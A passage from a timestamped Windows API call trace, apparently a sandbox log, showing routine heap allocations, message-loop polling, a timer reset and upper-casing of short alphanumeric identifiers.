wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.143] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0200.143] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.146] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0200.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.147] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.147] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.147] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.147] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.147] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.147] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0200.149] TranslateMessage (lpMsg=0x8bf710) returned 0 [0200.149] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0200.149] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0200.149] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0200.150] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.150] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.150] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0200.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0200.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0200.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0200.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.154] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0200.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.155] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.155] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0200.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.157] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.159] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.162] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.162] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0200.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.163] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.163] HeapFree (in: 